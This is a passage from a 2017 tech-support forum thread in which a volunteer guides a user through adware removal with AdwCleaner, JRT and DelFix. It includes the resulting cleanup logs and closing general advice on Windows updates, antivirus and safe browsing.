  • Download Junkware Removal Tool (JRT) and move it to your Desktop;
  • Right-click on JRT.exe and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Press on any key to launch the scan and let it complete;
    tLsXbWy.png
    Credits : BleepingComputer.com
  • Once the scan is complete, a log will open. Please copy/paste the content of the output log in your next reply;
Your next reply(ies) should therefore contain:
  • Copy/pasted AdwCleaner clean log;
  • Copy/pasted JRT log;

Edited by Aura, 04 August 2017 - 07:41 AM.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#12 Hercilio

Hercilio
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Brazil
  • Local time:03:55 AM

Posted 04 August 2017 - 08:19 AM

Hello Aura

 

Here is the AdwCleaner log:

 

# AdwCleaner 7.0.1.0 - Logfile created on Fri Aug 04 13:06:35 2017
# Updated on 2017/05/08 by Malwarebytes 
# Running on Windows 10 Home Single Language (X64)
# Mode: clean
 
***** [ Services ] *****
 
Deleted: AdvancedSystemCareService10
 
 
***** [ Folders ] *****
 
Deleted: C:\ProgramData\IObit\Advanced SystemCare
Deleted: C:\Windows\System32\config\systemprofile\AppData\Roaming\IObit\Advanced SystemCare
Deleted: C:\Windows\System32\config\systemprofile\AppData\LocalLow\IObit\Advanced SystemCare
Deleted: C:\Program Files (x86)\IObit\Advanced SystemCare
Deleted: C:\Program Files (x86)\Common Files\IObit\Advanced SystemCare
Deleted: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\IObit\Advanced SystemCare
Deleted: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\IObit\Advanced SystemCare
Deleted: C:\Users\All Users\IObit\Advanced SystemCare
Deleted: C:\Users\Hercílio\AppData\LocalLow\IObit\Advanced SystemCare
Deleted: C:\Users\Hercílio\AppData\Roaming\IObit\Advanced SystemCare
Deleted: C:\Users\Todos os Usuários\IObit\Advanced SystemCare
Deleted: C:\Users\Hercílio\AppData\Local\slimware utilities inc
Deleted: C:\Users\Public\Documents\pc faster
Deleted: C:\Users\Public\Documents\Guid
Deleted: C:\Users\Public\Documents\Downloaded Installers
Deleted: C:\Users\Hercílio\AppData\Local\SlimWare Utilities Inc
Deleted: C:\ProgramData\IObit\ASCDownloader
Deleted: C:\Users\All Users\IObit\ASCDownloader
Deleted: C:\Users\Todos os Usuários\IObit\ASCDownloader
Deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced SystemCare
Deleted: C:\ProgramData\50e0d510-87b9-4817-aac6-3c02b26d2112
Deleted: C:\ProgramData\51567d01-ec85-413b-811c-94ed81f27e25
Deleted: C:\ProgramData\ad714959-89cb-442d-95c9-972d76222811
 
 
***** [ Files ] *****
 
Deleted: C:\END
 
 
***** [ DLL ] *****
 
No malicious DLLs cleaned.
 
***** [ WMI ] *****
 
No malicious WMI cleaned.
 
***** [ Shortcuts ] *****
 
No malicious shortcuts cleaned.
 
***** [ Tasks ] *****
 
Deleted: ASC10_PerformanceMonitor
Deleted: Driver Booster Scheduler
 
 
***** [ Registry ] *****
 
Deleted: [Key] - HKLM\SOFTWARE\IOBIT\ASC
Deleted: [Key] - HKLM\SOFTWARE\CLASSES\DIRECTORY\SHELLEX\CONTEXTMENUHANDLERS\Advanced SystemCare
Deleted: [Key] - HKLM\SOFTWARE\CLASSES\DRIVE\SHELLEX\CONTEXTMENUHANDLERS\Advanced SystemCare
Deleted: [Key] - HKLM\SOFTWARE\CLASSES\LNKFILE\SHELLEX\CONTEXTMENUHANDLERS\Advanced SystemCare
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ask.com
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\chatango.com
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\st.chatango.com
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\st.chatango.com
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\staticimgfarm.com
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ttdetect.staticimgfarm.com
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\videodownloadconverter.dl.tb.ask.com
Deleted: [Value] - HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{54F82A2A-DB25-466E-8663-FE145DC48A47}
Deleted: [Value] - HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{F000EE94-3781-4402-BB3F-DE5085B0578C}
Deleted: [Key] - HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}
Deleted: [Key] - HKLM\SOFTWARE\SlimWare Utilities Inc
Deleted: [Key] - HKU\S-1-5-21-459013025-3067968454-1995941679-1001\Software\SlimWare Utilities Inc
Deleted: [Key] - HKCU\Software\SlimWare Utilities Inc
Deleted: [Key] - HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Deleted: [Key] - HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Deleted: [Key] - HKU\S-1-5-21-459013025-3067968454-1995941679-1001\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Deleted: [Key] - HKU\S-1-5-18\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Deleted: [Key] - HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Deleted: [Key] - HKLM\SOFTWARE\SLIMWARE UTILITIES, INC.
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Advanced SystemCare_is1
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\952BA647474611149866C1269F6A0E36
Deleted: [Key] - HKLM\SOFTWARE\Classes\Installer\Features\952BA647474611149866C1269F6A0E36
Deleted: [Key] - HKLM\SOFTWARE\Classes\Installer\Products\952BA647474611149866C1269F6A0E36
Deleted: [Value] - HKU\S-1-5-21-459013025-3067968454-1995941679-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|Advanced SystemCare 10
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ASC10_SkipUac_Hercílio
 
 
***** [ Firefox (and derivatives) ] *****
 
No malicious Firefox entries deleted.
 
***** [ Chromium (and derivatives) ] *****
 
No malicious Chromium entries deleted.
 
*************************
 
::Tracing keys deleted
::Winsock settings cleared
::Additional Actions: 0
 
 
 
*************************
 
C:/AdwCleaner/AdwCleaner[S0].txt - [6333 B] - [2017/8/4 13:4:37]
 
 
########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt ##########
 
Here is the JRT log:
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.4 (07.09.2017)
Operating System: Windows 10 Home Single Language x64 
Ran by Herc¡lio (Administrator) on 04/08/2017 at 10:14:15,20
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
File System: 11 
 
Successfully deleted: C:\ProgramData\ingiamckmcfijbpcaanbbnkmplbbegcl (Folder) 
Successfully deleted: C:\ProgramData\productdata (Folder) 
Successfully deleted: C:\Users\Herc¡lio\AppData\Roaming\3909 (Folder) 
Successfully deleted: C:\Users\Herc¡lio\AppData\Roaming\Mozilla\Firefox\Profiles\1yl2b5e1.default\user.js (File) 
Successfully deleted: C:\WINDOWS\system32\Tasks\Driver Booster SkipUAC (Herc¡lio) (Task)
Successfully deleted: C:\WINDOWS\system32\Tasks\PCDEventLauncherTask (Task)
Successfully deleted: C:\WINDOWS\system32\Tasks\PCDoctorBackgroundMonitorTask-Delay (Task)
Successfully deleted: C:\WINDOWS\system32\Tasks\PCDoctorBackgroundMonitorTask (Task)
Successfully deleted: C:\WINDOWS\system32\Tasks\SmartDefrag_Startup (Task)
Successfully deleted: C:\WINDOWS\system32\Tasks\Uninstaller_SkipUac_Herc¡lio (Task)
Successfully deleted: C:\WINDOWS\Tasks\Uninstaller_SkipUac_Herc¡lio.job (Task) 
 
 
 
Registry: 0 
 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 04/08/2017 at 10:18:02,34
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 


#13 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,683 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:55 AM

Posted 04 August 2017 - 09:16 AM

Good :) How's your system behaving now? Are there any other issues to address?

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#14 Hercilio

Hercilio
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Brazil
  • Local time:03:55 AM

Posted 04 August 2017 - 09:31 AM

It's doing just fine! I appreciate the help Aura. Everything was quick and easy to understand. 

 

Have a nice day good sir!



#15 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,683 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:55 AM

Posted 04 August 2017 - 09:35 AM

Good, thank you for letting me know!
Since there are no signs of infection anymore in your logs, and you just told me that there are no more issues left to address, I guess we're done here. We'll wrap it up by running DelFix to delete the tools and logs that were used in this clean-up.

BWuhenj.pngDelFix
Follow the instructions below to download and execute DelFix.
  • Download DelFix and move the executable to your Desktop;
  • Right-click on DelFix.exe and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Check the following options :
    • Activate UAC;
    • Remove disinfection tools;
    • Create registry backup;
    • Purge system restore;
    • Reset system settings;
  • Once all the options mentionned above are checked, click on Run;
  • After DelFix is done running, a log will open. Please copy/paste the content of the output log in your next reply;
Qt25440.pngTips, tricks, advice and recommendations

Now it's time to give you some tips, tricks, advice and recommendations on how to protect your system and prevent you from being infected in the future. This is where I'll explain basic security measures that you should take to protect and harden your system, and also make sure it stays as safe and secure as possible against hackers and malware. You are free to ignore the recommendations listed below, although I obviously do not recommend it. If you have any questions about one of the points covered in the speech below, feel free to ask me your questions here directly so I can answer them and guide you.

Windows Updates

Keeping Windows up to date is one of the first steps in having a safe and secure system. The Security Updates that Windows receives are meant to fix exploits and flaws in it that makes it more secure and not exploitable by hackers. In order to do that, you should always install the Security Updates, known as "Important Updates" on your Windows system. These updates are released on the second Tuesday of every month, but some are also released before if they are emergency/critical Security Updates. Let's make sure that you have all your Important Updates and Recommended Updates installed and that your Windows Updates are set to be installed automatically.Keeping your programs up-to-date

Like keeping Windows updated, keeping your installed programs up-to-date is another important step in having a safe and secure system. Outdated programs can be exploited by hackers and malware to infect a system and take it over. This is especially true today with the rise of Exploit Kits (and also 0-days) which is one of the biggest attack vectors to distribute malware. Therefore, you should always keep vulnerable programs like Adobe Flash Player, Adobe Shockwave Player, Java, Silverlight, Google Chrome, Mozilla Firefox, VLC Media Player, etc. updated to their most recent version (even better, you don't have to install them if you don't use them). Programs like eLDnJfI.pngSecuniaPSI and y5YE7At.pngHeimdal Free will scan your system for outdated programs, and help you identify them, as well as update them.Anti-Virus, Anti-Malware, Firewall and Anti-Exploit/Ransomware

Having a decent security setup (which also includes an Anti-Virus) is the most crucial step to protect a system. These programs are a layer of defence that will prevent a system from being infected, or if it somehow ends up infected, help mitigate the infection and remediate it. Ideally, you should have on your system one Antivirus (never more than one installed at the time), one Antimalware (you can install multiple of these, assuming they do not conflict with each other and the other security programs installed), one Firewall and if you wish, one Anti-Exploit and/or Anti-Ransomware (since Ransomware are currently the most dangerous threat around and it can hit anywhere). Here are a few programs worth checking out if you don't have one yet.

Note: The programs listed below are all free to use or they have some sort of trial. Some of them have a paid version that provides more features, while a lot of other good programs only have a paid version but aren't listed there (such as Kaspersky and ESET Antivirus products).

Anti-VirusAnti-Malware
  • j1Bynr2.pngMalwarebytes - Has both a free and paid version. The Premium version of Malwarebytes also offers Exploit and Ransomware protection, for a complete package of: Malware, Web, Exploit and Ransomware protection
  • S2NFpNw.pngHitmanPro 3 - Free 30 day trial
  • ncqvIpu.pngZemana AntiMalware - Free 30 day trial
Firewall
Starting in Windows Vista, the Windows Firewall greatly improved and will satisfy the needs of most users. If you do not have an Internet Suite Antivirus program (which includes a firewall) and you want to use a 3rd party firewall, you can consider the options below.
  • 7p3JzTS.pngGlassWire - Has both a free and paid version (with different packages)
  • MQIMh6k.pngWindows Firewall Control - Gives you more control over your Windows Firewall
  • 5RXGshU.pngTinyWall - Lightweight firewall implementing the Windows Firewall and giving you more control over it
Anti-Exploit/Anti-RansomwareWeb Browsers and Web Browsing

Web Browsers could be considered as the closest door between a malware and your system. This is where most malware goes through to infect a system, and therefore it should be the program(s) you want to secure the most. There are two ways of going about it: hardening your web browser via extensions, and having good browsing habits.

Hardening your web browser means to install extensions that will help it protect itself (and your system on the same occasion) against Exploit Kits, MiTM attacks, etc. but also you at the same time. Here are a few extensions that I recommend you to install.
  • uBlock Origin: Efficient multi-purpose blocker that is lightweight on RAM and CPU usage (Google Chrome, Mozilla Firefox, Microsoft Edge, Opera and most Chromium and Firefox-based browsers)
  • HTTPS Everywhere: Extension that converts your HTTP (unencrypted) requests to HTTPS (encrypted) ones (Google Chrome, Mozilla Firefox and Opera)
  • Web of Trust: Website reputation, rating and review extension that will help you quickly identify bad and suspicious sites from good ones (every web browsers)
  • NoScript: NoScript is a script blocker (Java, Flash, JavaScript, etc.) for Mozilla Firefox and Firefox-based browsers (Mozilla Firefox and Firefox-based web browsers)
  • uMatrix: For advanced users, a point and click matrix-like extensions that allow you to control requests done on a webpage (based on source, destination and type) (Google Chrome, Mozilla Firefox and Opera)
  • LastPass: Secure password manager allowing you to create, manage, and use passwords you save in your LastPass account (every web browser)
As for safe browsing habits, you can find tons of guides, tutorials, articles, etc. online that will highlight the basics you need to follow (only visit websites you trust, do not click on ads, do not download files from untrusted sources, use a password manager, always verify the URL of a website and make sure it's correctly typed, etc.), and even what you can do if you want to take it a step further (create a fake email address for spam emails, browse the web in a privacy mode, etc.). Here are a few:As you can see, there are plenty of resources out there. Simply Googling "good browsing habits" or "safe browsing habits" should allow you to find a lot of them.

Other recommendations

Even if you follow every recommendation that I listed here, in the end, it's also your job to be careful when browsing the web and downloading files if you don't want to get infected. Therefore, if you use your brain (common sense) when browsing the web, downloading programs and files, etc., you have far less chances to get infected by a malware. If for example you're not sure if a website is legitimate or not, or if a file is safe to download and execute, or if a program looks "too good" to be free, I suggest you to avoid going to that website, downloading that file or using that program.

Here are a few guides, tutorials, articles, etc. that you could read in order to learn more about computer protection and security to improve your current computer protection setup but also improve your good web browsing and computer usage practices :gRvSooB.pngThe End!

And that's it! Now that you know more about how to protect your computer and secure it, you're good to go back to your online activities, but in a safe and secure way! You are also free to stay on the forums and ask for help in different topics if you ever need to. Just make sure that you post your question/issue in the right section to get the best assistance possible. And if you ever get infected again (which I hope you wont!), you can always comeback in this section to get another checkup with one of our trained malware removal member.

Do you have any questions before I close this thread? :)

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users